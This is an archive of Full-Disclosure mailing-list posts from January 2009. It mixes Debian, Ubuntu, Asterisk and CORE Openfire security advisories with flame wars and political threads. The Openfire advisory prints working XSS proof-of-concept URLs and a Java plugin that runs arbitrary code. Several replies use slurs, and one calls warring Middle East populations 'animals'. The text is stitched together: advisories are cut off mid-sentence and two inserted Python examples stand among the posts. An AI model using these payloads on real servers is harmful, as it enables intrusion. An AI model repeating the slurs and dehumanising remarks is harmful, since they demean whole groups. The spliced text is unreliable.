Re: [Full-disclosure] [Suspected Spam]Security Assessment of the Internet Protocol the IETF
Hi,

I still have not read all your paper, but my first word is congratulations! That's a hard job.

Since a quick search didn't give a result for it, and maybe others could be interested: The AVISPA (Automated Validation of Internet Security Protocols and Applications) project aims at developing a push-button, industrial-strength technology for the analysis of large-scale Internet security-sensitive protocols and applications. This website contains all relevant information about AVISPA for project members, interested third parties and scientists worldwide.
http://www.avispa-project.org/

My 2 cents for now
/JA

Fernando Gont wrote:
> Folks,
>
> In August 2008 the UK CPNI (United Kingdom's Centre for the Protection of National Infrastructure) published the document "Security Assessment of the Internet Protocol". The motivation of the aforementioned document is explained in the Preface of the document itself. (The paper is available at: http://www.cpni.gov.uk/Docs/InternetProtocol.pdf )
>
> Once the paper was published by CPNI, I produced an IETF Internet-Draft version of the same paper, with the intent of having the IETF publish recommendations and/or update the specifications where necessary. This IETF Internet-Draft is available at: http://www.gont.com.ar/drafts/ip-security/index.html (and of course it's also available at the IETF I-D repository).
>
> The Internet-Draft I published was aimed at the OPSEC WG. And the Working Group is right now deciding whether to accept this document as a WG item. This is certainly a critical step. Having the OPSEC WG accept this document as a WG item would guarantee to some extent that the IETF will do something about all this, and would also somehow set a precedent in updating the specifications of core protocols and/or providing advice on security aspects of them.
>
> The call for consensus is available at: http://www.ietf.org/mail-archive/web/opsec/current/msg00373.html
>
> You can voice your opinion on the relevant mailing-list by sending an e-mail to op...@ietf.org . You don't need to subscribe to the mailing list to post a message (although your message will be held for moderator approval before it is distributed to the list members). The deadline for posting your opinion is January 9th (next Friday).
>
> Thanks so much!
>
> Kind regards,
> Fernando Gont
>
> --
> Fernando Gont
> e-mail: ferna...@gont.com.ar || fg...@acm.org
> PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1697-1] New iceape packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

------------------------------------------------------------------------
Debian Security Advisory DSA-1697-1                  secur...@debian.org
http://www.debian.org/security/                           Steffen Joeris
January 07, 2009                      http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : iceape
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2008-0016 CVE-2008-0304 CVE-2008-2785 CVE-2008-2798 CVE-2008-2799 CVE-2008-2800 CVE-2008-2801 CVE-2008-2802 CVE-2008-2803 CVE-2008-2805 CVE-2008-2807 CVE-2008-2808 CVE-2008-2809 CVE-2008-2810 CVE-2008-2811 CVE-2008-2933 CVE-2008-3835 CVE-2008-3836 CVE-2008-3837 CVE-2008-4058 CVE-2008-4059 CVE-2008-4060 CVE-2008-4061 CVE-2008-4062 CVE-2008-4065 CVE-2008-4067 CVE-2008-4068 CVE-2008-4069 CVE-2008-4070 CVE-2008-5012 CVE-2008-5013 CVE-2008-5014 CVE-2008-5017 CVE-2008-0017 CVE-2008-5021 CVE-2008-5022 CVE-2008-5500 CVE-2008-5503 CVE-2008-5506 CVE-2008-5507 CVE-2008-5508 CVE-2008-5511 CVE-2008-5512

Several remote vulnerabilities have been discovered in Iceape, an unbranded version of the Seamonkey internet suite. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-0016
    Justin Schuh, Tom Cross and Peter Williams discovered a buffer overflow in the parser for UTF-8 URLs, which may lead to the execution of arbitrary code. (MFSA 2008-37)

CVE-2008-0304
    It was discovered that a buffer overflow in MIME decoding can lead to the execution of arbitrary code. (MFSA 2008-26)

CVE-2008-2785
    It was discovered that missing boundary checks on a reference counter for CSS objects can lead to the execution of arbitrary code. (MFSA 2008-34)

CVE-2008-2798
    Devon Hubbard, Jesse Ruderman and Martijn Wargers discovered crashes in the layout engine, which might allow the execution of arbitrary code. (MFSA 2008-21)

CVE-2008-2799
    Igor Bukanov, Jesse Ruderman and Gary Kwong discovered crashes in the Javascript engine, which might allow the execution of arbitrary code. (MFSA 2008-21)

CVE-2008-2800
    moz_bug_r_a4 discovered several cross-site scripting vulnerabilities. (MFSA 2008-22)

CVE-2008-2801
    Collin Jackson and Adam Barth discovered that Javascript code could be executed in the context of signed JAR archives. (MFSA 2008-23)

CVE-2008-2802
    moz_bug_r_a4 discovered that XUL documents can escalate privileges by accessing the pre-compiled fastload file. (MFSA 2008-24)

CVE-2008-2803
    moz_bug_r_a4 discovered that missing input sanitising in the mozIJSSubScriptLoader.loadSubScript() function could lead to the execution of arbitrary code. Iceape itself is not affected, but some addons are. (MFSA 2008-25)

CVE-2008-2805
    Claudio Santambrogio discovered that missing access validation in DOM parsing allows malicious web sites to force the browser to upload local files to the server, which could lead to information disclosure. (MFSA 2008-27)

CVE-2008-2807
    Daniel Glazman discovered that a programming error in the code for parsing .properties files could lead to memory content being exposed to addons, which could lead to information disclosure. (MFSA 2008-29)

CVE-2008-2808
    Masahiro Yamada discovered that file URLs in directory listings were insufficiently escaped. (MFSA 2008-30)

CVE-2008-2809
    John G. Myers, Frank Benkstein and Nils Toedtmann discovered that alternate names on self-signed certificates were handled insufficiently, which could lead to spoofing of secure connections. (MFSA 2008-31)

CVE-2008-2810
    It was discovered that URL shortcut files could be used to bypass the same-origin restrictions. This issue does not affect current Iceape, but might occur with additional extensions installed. (MFSA 2008-32)

CVE-2008-2811
    Greg McManus discovered a crash in the block reflow code, which might allow the execution of arbitrary code. (MFSA 2008-33)

CVE-2008-2933
    Billy Rios discovered that passing a URL containing a pipe symbol to Iceape can lead to Chrome privilege escalation. (MFSA 2008-35)

CVE-2008-3835
    moz_bug_r_a4 discovered that the same-origin check in nsXMLDocument::OnChannelRedirect() could be bypassed. (MFSA 2008-38)

CVE-2008-3836
    moz_bug_r_a4 discovered that several vulnerabilities in feedWriter could lead to Chrome privilege escalation. (MFSA 2008-39)

CVE-2008-3837
    Paul Nickerson discovered that an attacker could move windows during a mouse click, resulting in unwanted action triggered by drag-and-drop. (MFSA 2008-40)

CVE-2008-4058
    moz_bug_r_a4 discovered a vulnerability which can result in Chrome privilege escalation through XPCNativeWrappers. (MFSA 2008-41)

CVE-2008-4059
    moz_bug_r_a4 discovered a vulnerability which
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote:
> I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd.

I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Yeah but you also see the world in some fucked up, retarded, distorted, and psychedelic way while the rest of us see it normally.

On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote:
> On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote:
>> I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd.
>
> I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
This is the average user response from full-disclosure, no capacity to have a serious conversation.

On Thu, Jan 8, 2009 at 2:15 PM, vulcanius vulcan...@gmail.com wrote:
> Yeah but you also see the world in some fucked up, retarded, distorted, and psychedelic way while the rest of us see it normally.
>
> On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote:
>> I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
o i c. were dumb and ur smart..

On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote:
> On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote:
>> I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd.
>
> I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Never :)

On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote:
> so leave?
>
> On Thu, Jan 8, 2009 at 9:23 AM, n3td3v xploita...@gmail.com wrote:
>> This is the average user response from full-disclosure, no capacity to have a serious conversation.
>>
>> On Thu, Jan 8, 2009 at 2:15 PM, vulcanius vulcan...@gmail.com wrote:
>>> Yeah but you also see the world in some fucked up, retarded, distorted, and psychedelic way while the rest of us see it normally.
>>>
>>> On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote:
>>>> I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Yes you are pretty dumb.

On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote:
> o i c. were dumb and ur smart..
>
> On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote:
>> On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote:
>>> I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd.
>>
>> I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
Can everyone please reply to this thread so I know who hates who (it's for my Social profile of this list). But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already, it's easy and I know people that know people to provide the pure stuff). anyways kids,

Cheers.

Steve Clement

On Jan 8, 2009, at 4:17 PM, n3td3v wrote:
> Yes you are pretty dumb.
>
> On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote:
>> o i c. were dumb and ur smart..
>>
>> On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote:
>>> On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote:
>>>> I don't think that your post is on topic of this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd.
>>>
>>> I see cyber war being used incorrectly a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
It's some kind of peer pressure tactic he's been trying, it's pretty lame though and just ruins the list by arguing with me. I'm not like Gobbles who released a vulnerability out of peer pressure, that was pretty lame :) You're messing with the big boys Ureleet, so maybe after a whole year trying your tactic, you kill off your nickname now and try something different on a different name?

On Thu, Jan 8, 2009 at 3:40 PM, Steve Clement st...@localhost.lu wrote:
> Can everyone please reply to this thread so I know who hates who (it's for my Social profile of this list). But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already, it's easy and I know people that know people to provide the pure stuff). anyways kids,
>
> Cheers.
>
> Steve Clement
[Full-disclosure] CORE-2008-1128: Openfire multiple vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

Openfire multiple vulnerabilities

1. *Advisory Information*

Title: Openfire multiple vulnerabilities
Advisory ID: CORE-2008-1128
Advisory URL: http://www.coresecurity.com/content/openfire-multiple-vulnerabilities
Date published: 2009-01-08
Date of last update: 2009-01-07
Vendors contacted: Jive Software
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Cross site scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 32935, 32937, 32938, 32939, 32940, 32943, 32944, 32945
CVE Name: N/A

3. *Vulnerability Description*

Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the widely adopted open protocol for instant messaging XMPP, also called Jabber. Multiple cross-site scripting vulnerabilities have been found, which may lead to arbitrary remote code execution on the server running the application due to unauthorized upload of Java plugin code.

4. *Vulnerable packages*

. Openfire 3.6.2

5. *Non-vulnerable packages*

. Openfire 3.6.3

6. *Vendor Information, Solutions and Workarounds*

Openfire will release a fixed version through their community web site [1].

7. *Credits*

These vulnerabilities were discovered and researched by Federico Muttis, from CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies.

8. *Technical Description / Proof of Concept Code*

Multiple cross-site scripting vulnerabilities have been found in Openfire, which may lead to arbitrary remote code execution on the server running Openfire server due to unauthorized upload of Java plugin code.

8.1. *Reflected XSS Vulnerabilities*

Several cross site scripting (XSS) vulnerabilities were detected that lead to cross site request forgery (XSRF), which enable arbitrary remote code execution on the server running the application. These vulnerabilities are network exploitable but the victim must voluntarily interact with the attack mechanism. The victim must be an authorized user to deploy the complete attack.

We identified insufficient sanitization of several parameters in several scripts. In the case of 'logviewer.jsp' (BID 32935), 'group-summary.jsp' (BID 32937), 'user-properties.jsp' (BID 32938) and 'audit-policy.jsp' (BID 32939) there is no sanitization at all. In 'log.jsp' (BID 32940) there is a filter against 'script', which is not enough, because several other XSS vectors exist, like the one we show below.

Proof of Concept 'alert()' exploits follow.

[BID 32935] Insufficient sanitization in 'logviewer.jsp', parameter 'log':

/---
http://vulnsite.com/logviewer.jsp?clearLog=false&emailLog=false&lines=&log=%22/%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&markLog=false&mode=desc&refresh=&saveLog=false
---/

[BID 32937] Insufficient sanitization in 'group-summary.jsp', parameter 'search':

/---
http://vulnsite.com/group-summary.jsp?search=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E!--
---/

[BID 32938] Insufficient sanitization in 'user-properties.jsp', parameter 'username':

/---
http://vulnsite.com/user-properties.jsp?username=%3Cscript%3Ealert(%27xss%27)%3C/script%3E
---/

[BID 32939] Insufficient sanitization in 'audit-policy.jsp', the vulnerable parameters are: 'logDir', 'logTimeout', 'maxDays', 'maxFileSize' and 'maxTotalSize'.

/---
http://vulnsite.com/audit-policy.jsp?maxTotalSize=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E%3C!--&update=Save%20Settings
---/

[BID 32940] Insufficient sanitization in 'log.jsp', 'script' gets filtered out but vectors like 'img' still work:

/---
http://vulnsite.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27javascript:alert(%22xss%22)%27%3E
---/

8.2. *Arbitrary Remote Code Execution*

Once the Openfire administrator's browser is executing arbitrary Javascript and his/her session cookies have been stolen, it is trivial to execute arbitrary code as there is no need to re-authenticate to upload a new server plugin. Secure web applications generally re-authenticate the administrator when performing such sensitive tasks. In this case, however, you can simply upload a new plugin, without re-authentication, with arbitrary Java code on the constructor. The constructor will be called when the plugin is uploaded.

In order to create a potentially malicious plugin that executes arbitrary Java code on the context of the server, you need to download the Openfire source [2] and the apache ant tool [3]. Uncompress the Openfire source and install the ant tool. You can modify any existing plugin, add this code and call it from the constructor:

/---
public void start() {
    try {
        Runtime.getRuntime().exec("C:\\WINDOWS\\system32\\calc.exe");
    } catch (Exception ex) {
        ex.printStackTrace();
    }
}
---/

Then
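Why the 'script' filter in log.jsp is not enough, and what stops the 'img' vector the advisory shows, as an added example (not code from the advisory or from Openfire): the filter regex, the page template and the detector are assumptions; only the two vectors come from the advisory's PoC URLs.

```python
import html
import re
from html.parser import HTMLParser

# Vectors from the advisory's proof-of-concept URLs, URL-decoded.
SCRIPT_VECTOR = "<script>alert('xss')</script>"
IMG_VECTOR = "<img src='' onerror='javascript:alert(\"xss\")'>"

# Constructed stand-in for a page that reflects the 'log' parameter into
# HTML body text; the real log.jsp markup is not on the page.
TEMPLATE = "<p>Showing log: {value}</p>"
TEMPLATE_TAGS = ["p"]


def blocklist_filter(value):
    """Models the insufficient filter described for log.jsp: <script> tags are
    dropped, every other tag survives (assumed shape of the original filter)."""
    return re.sub(r"</?script[^>]*>", "", value, flags=re.IGNORECASE)


def encode_for_html_body(value):
    """Contextual output encoding: < > & and quotes become entities, so the
    value can no longer open a tag, whatever element name it contains."""
    return html.escape(value, quote=True)


def render_log_page(log_value, sanitize):
    """Render the constructed page with the given sanitizer applied to input."""
    return TEMPLATE.format(value=sanitize(log_value))


class _TagCollector(HTMLParser):
    """Collects start tags and on* event-handler attributes from rendered HTML."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def injected(rendered):
    """Detection check for a response body: any tag beyond the template's own,
    or any event-handler attribute, means user input became markup."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return parser.tags != TEMPLATE_TAGS or bool(parser.handlers)


if __name__ == "__main__":
    for name, vector in (("script", SCRIPT_VECTOR), ("img", IMG_VECTOR)):
        for label, san in (("blocklist", blocklist_filter), ("encode", encode_for_html_body)):
            print(f"{name:6} {label:9} injected={injected(render_log_page(vector, san))}")
```

The blocklist passes the 'img' vector untouched while encoding neutralises both, which is the advisory's point that removing one tag name is not sanitization.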
[Full-disclosure] [USN-705-1] NTP vulnerability
===========================================================
Ubuntu Security Notice USN-705-1             January 08, 2009
ntp vulnerability
CVE-2009-0021
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  ntp-refclock  1:4.2.0a+stable-8.1ubuntu6.1
  ntp-simple    1:4.2.0a+stable-8.1ubuntu6.1

Ubuntu 7.10:
  ntp           1:4.2.4p0+dfsg-1ubuntu2.1

Ubuntu 8.04 LTS:
  ntp           1:4.2.4p4+dfsg-3ubuntu2.1

Ubuntu 8.10:
  ntp           1:4.2.4p4+dfsg-6ubuntu2.2

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

It was discovered that NTP did not properly perform signature verification. A remote attacker could exploit this to bypass certificate validation via a malformed SSL/TLS signature.

Updated packages for Ubuntu 6.06 LTS:
[Full-disclosure] AST-2009-001: Information leak in IAX2 authentication
Asterisk Project Security Advisory - AST-2009-001

Product            : Asterisk
Summary            : Information leak in IAX2 authentication
Nature of Advisory : Unauthorized data disclosure
Susceptibility     : Remote Unauthenticated Sessions
Severity           : Minor
Exploits Known     : Yes
Reported On        : October 15, 2008
Reported By        : http://www.unprotectedhex.com
Posted On          : January 7, 2009
Last Updated On    : January 7, 2009
Advisory Contact   : Tilghman Lesher tlesher AT digium DOT com
CVE Name           : CVE-2009-0041

Description:

IAX2 provides a different response during authentication when a user does not exist, as compared to when the password is merely wrong. This allows an attacker to scan a host to find specific users on which to concentrate password cracking attempts.

The workaround involves sending back responses that are valid for that particular site. For example, if it were known that a site only uses RSA authentication, then sending back an MD5 authentication request would similarly identify the user as not existing. The opposite is also true. So the solution is always to send back an authentication response that corresponds to a known frequency with which real authentication responses are returned, when the user does not exist. This makes it very difficult for an attacker to guess whether a user exists or not, based upon this particular mechanism.

Resolution:

Upgrade to revision 167259 of the 1.2 branch or 167260 of the 1.4 branch or one of the releases noted below.

Affected Versions:

Product               Release Series   Affected
Asterisk Open Source  1.2.x            All versions prior to 1.2.31
Asterisk Open Source  1.4.x            All versions prior to 1.4.23-rc4
Asterisk Open Source  1.6.x            All versions prior to 1.6.0.3-rc2
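A model of the pre-fix and post-fix IAX2 challenge behaviour described in the advisory, with a defender-side check for the leak, written here as an added example (not Asterisk code): the peer table, the per-name keying with `SERVER_SECRET`, and the empty-table fallback are assumptions; the "known frequency" rule and the all-RSA-site caveat are the advisory's.

```python
import hashlib
import hmac
import os
import secrets
from collections import Counter
from dataclasses import dataclass

# Constructed peer table: username -> authentication method configured for
# that peer. IAX2 supports plaintext, md5 and rsa; this mix is invented.
PEERS = {"alice": "md5", "bob": "md5", "carol": "rsa", "dave": "md5"}

# Per-server secret so the method chosen for a non-existent name is stable
# across probes (an added design choice, not part of the advisory).
SERVER_SECRET = os.urandom(32)


@dataclass(frozen=True)
class AuthResponse:
    kind: str            # "AUTHREQ" (challenge sent) or "REJECT"
    method: str = ""     # method named in the challenge: "plaintext", "md5" or "rsa"
    challenge: str = ""  # nonce for md5/rsa challenge-response


def vulnerable_respond(username, peers=PEERS):
    """Pre-fix behaviour per AST-2009-001: unknown users are rejected
    immediately while known users get a challenge, so the two cases can be
    told apart before any password is tried."""
    if username not in peers:
        return AuthResponse("REJECT")
    return AuthResponse("AUTHREQ", peers[username], secrets.token_hex(8))


def _method_for_unknown(username, peers, secret):
    """Pick a method for a non-existent user with the same frequency as the
    real peer table (the advisory's 'known frequency'), keyed on the name so
    repeated probes of one name always see the same answer."""
    counts = Counter(peers.values())
    total = sum(counts.values())
    if total == 0:
        return "md5"  # constructed fallback for an empty peer table
    digest = hmac.new(secret, username.encode("utf-8"), hashlib.sha256).digest()
    pick = int.from_bytes(digest[:4], "big") % total
    for method, n in sorted(counts.items()):
        if pick < n:
            return method
        pick -= n
    raise AssertionError("unreachable: pick is always below total")


def fixed_respond(username, peers=PEERS, secret=SERVER_SECRET):
    """Post-fix behaviour: every name gets a challenge; for unknown names the
    method follows the site's real distribution, so an all-RSA site never
    reveals a missing user by answering with MD5 (the advisory's example)."""
    method = peers.get(username) or _method_for_unknown(username, peers, secret)
    return AuthResponse("AUTHREQ", method, secrets.token_hex(8))


def leaks_user_existence(respond, peers=PEERS, probes=200):
    """Defender-side check: do response kinds, or the set of methods offered,
    differ between real usernames and invented ones?"""
    real_kinds = {respond(u).kind for u in peers}
    real_methods = {respond(u).method for u in peers}
    fake = [respond(f"nobody{i}") for i in range(probes)]
    fake_kinds = {r.kind for r in fake}
    fake_methods = {r.method for r in fake}
    return real_kinds != fake_kinds or not fake_methods <= real_methods


if __name__ == "__main__":
    print("vulnerable leaks:", leaks_user_existence(vulnerable_respond))
    print("fixed leaks:     ", leaks_user_existence(fixed_respond))
```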
Re: [Full-disclosure] The war in Palestine
On Sun, Jan 04, 2009 at 10:15:49PM -0600, Paul Schmehl wrote:
> So you think it's evil to shoot back when someone is shooting at you?

this may depend on your religion. iirc jesus turned the other cheek.

what you seem to be saying is the ambiguous quote: one man's terrorist is another man's freedom fighter

--
Re: [Full-disclosure] The war in Palestine
--On Thursday, January 08, 2009 13:38:37 -0600 Georgi Guninski gunin...@guninski.com wrote:
> On Sun, Jan 04, 2009 at 10:15:49PM -0600, Paul Schmehl wrote:
>> So you think it's evil to shoot back when someone is shooting at you?
>
> this may depend on your religion. iirc jesus turned the other cheek.

Not sure how he (or even religion in general) got dragged into this

> what you seem to be saying is the ambiguous quote: one man's terrorist is another man's freedom fighter

That's a bs phrase anyway. Terrorists are very easy to define. They target and kill civilians deliberately. That is a completely unambiguous definition. Notice I said deliberately. Civilians always die in armed conflicts. Terrorists kill them on purpose.

--
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions are my own and not those of my employer.
*** Check the headers before clicking on Reply.
Re: [Full-disclosure] The war in Palestine
I say let the animals eat each other... I'm sorry to be callous but there's just no reason to throw civilized society into a frenzy over this. This is a battle that has raged since forever, and I'm willing to bet that most of these people (loosely termed) can't even remember why the hell they're fighting each other, or why they hate each other. Stupidity of the human race I guess...

__
Raf

--
From: Paul Schmehl pschmehl_li...@tx.rr.com
Sent: Thursday, January 08, 2009 2:28 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] The war in Palestine

> --On Thursday, January 08, 2009 13:38:37 -0600 Georgi Guninski gunin...@guninski.com wrote:
>> On Sun, Jan 04, 2009 at 10:15:49PM -0600, Paul Schmehl wrote:
>>> So you think it's evil to shoot back when someone is shooting at you?
>>
>> this may depend on your religion. iirc jesus turned the other cheek.
>
> Not sure how he (or even religion in general) got dragged into this
>
>> what you seem to be saying is the ambiguous quote: one man's terrorist is another man's freedom fighter
>
> That's a bs phrase anyway. Terrorists are very easy to define. They target and kill civilians deliberately. That is a completely unambiguous definition. Notice I said deliberately. Civilians always die in armed conflicts. Terrorists kill them on purpose.
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions are my own and not those of my employer.
> *** Check the headers before clicking on Reply.
Re: [Full-disclosure] ImmunitySec is an NSA front.
Well it's now an Israeli Plot.

On Thu, Jan 8, 2009 at 9:52 PM, ChromeSilver chromesil...@exec-labs.com wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Dear Prof. Chatner,
>
> I don't know what you mean, on GoogleEarth it's 3D-Building.
>
> Cheers,
> ChromeSilver
>
> If light be the brightest light... Wherfore then doth it shadows cast? -R.Rohonyi
>
> Professor Micheal Chatner wrote:
>> I have recently witnessed a conspiracy by ImmunitySEC headed by the Israeli spy David Aitel.
>>
>> http://maps.google.com/maps?q=IMMUNITYSEC,+miami,+floe=utf-8client=firefox-aie=UTF8ll=25.783508,-80.140972spn=0,359.818039z=13iwloc=Alayer=ccbll=25.783635,-80.140995panoid=RuVREzzTYFjcmaegYtzhRgcbp=12,441.86166752012093,,0,5
>>
>> As you can see their entire road is BLURRED OUT. This is obviously a tactic to keep out the Chinese spies that they time and time again sell 0day to. It is too complicated to explain now but I will have more research later.
>>
>> Professor Micheal Chatner, M.D. CISSP

--
http://www.goldwatches.com/
http://www.jewelerslounge.com/
Re: [Full-disclosure] ImmunitySec is an NSA front.
Aren't NSA and Mossad supposed to be enemies? I mean, what about all the crap about Israelis hacking into NSA's unpatched Exchange Server 2003 and putting messages there that resulted in the U.S. invading Iraq? And while you are at it, since Dave is in favor of Python, should we just abandon Canvas and go back to Metasploit? And having that in mind, does anybody know if Obama prefers Python or Ruby?

Well, before full-disclosure turns into clown-disclosure, I thought I deserved to send a message after all these years of being a silent contributor.

On Fri, Jan 9, 2009 at 2:35 AM, James Matthews nytrok...@gmail.com wrote:

Well it's now an Israeli Plot.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
y? its working. u r proving every day how much of an idiot u r. like, for instance posting about ur OWN FUCKING TWITTER post! lol. its not a tactic. i really do h8 u. im not in it 4 every1 else. just sitting here h8ing u is enuf. and which big boys m i playing with? u? LOLOLOLOLLOLOLOLOLOLOLOLOLOLOLOLOOLOL sigh. LOLOLOLOLOLOLOLOLOLOROFLROFLROFLROFLROFLROFLROFL thatll be the day dickwad. gobbles has released. what have u released besides a too-long tirade of nonsense that no 1 cares about?

On Thu, Jan 8, 2009 at 11:45 AM, n3td3v xploita...@gmail.com wrote:

It's some kind of peer pressure tactic he's been trying, it's pretty lame though and just ruins the list by arguing with me. I'm not like Gobbles who released a vulnerability out of peer pressure that was pretty lame :) You're messing with the big boys Ureleet, so maybe after a whole year trying your tactic, you kill off your nickname now and try something different on a different name?

On Thu, Jan 8, 2009 at 3:40 PM, Steve Clement st...@localhost.lu wrote:

Can everyone please reply to this thread so I know who hates who (it's for my Social profile of this list). But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already, it's easy and I know people that know people to provide the pure stuff). Anyways kids, Cheers. Steve Clement
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
i h8 u both.

On Thu, Jan 8, 2009 at 10:40 AM, Steve Clement st...@localhost.lu wrote:

Can everyone please reply to this thread so I know who hates who (it's for my Social profile of this list). But more importantly so I know (or rather all know) who to filter out because they lack the respect to take their wars offline (cmon' nuke each other already, it's easy and I know people that know people to provide the pure stuff). Anyways kids, Cheers. Steve Clement

On Jan 8, 2009, at 4:17 PM, n3td3v wrote:

Yes you are pretty dumb.

On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote:

o i c. were dumb and ur smart..

On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote:

On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote:

I don't think that your post is on topic for this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd.

I see cyber war being used incorrectly as a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
pot kettle black u cunt

On Thu, Jan 8, 2009 at 10:17 AM, n3td3v xploita...@gmail.com wrote:

Yes you are pretty dumb.

On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote:

o i c. were dumb and ur smart..

On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote:

On Wed, Jan 7, 2009 at 3:22 PM, Jan G.B. ro0ot.w...@googlemail.com wrote:

I don't think that your post is on topic for this list. And I don't think anyone is following you - guess that's the reason why you're *here*, again. Also, an intellectual reply to your posting would be quite absurd.

I see cyber war being used incorrectly as a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
dont smile at me faggot.

On Thu, Jan 8, 2009 at 10:13 AM, n3td3v xploita...@gmail.com wrote:

Never :)

On Thu, Jan 8, 2009 at 3:06 PM, Ureleet urel...@gmail.com wrote:

so leave?

On Thu, Jan 8, 2009 at 9:23 AM, n3td3v xploita...@gmail.com wrote:

This is the average user response from full-disclosure, no capacity to have a serious conversation.

On Thu, Jan 8, 2009 at 2:15 PM, vulcanius vulcan...@gmail.com wrote:

Yeah but you also see the world in some fucked up, retarded, distorted, and psychedelic way while the rest of us see it normally.

On Thu, Jan 8, 2009 at 7:12 AM, n3td3v xploita...@gmail.com wrote:

I see cyber war being used incorrectly as a national security issue. You may not realise that it might be, but I see it as being one.
Re: [Full-disclosure] Full-Disclosure wouldn't let me post this message
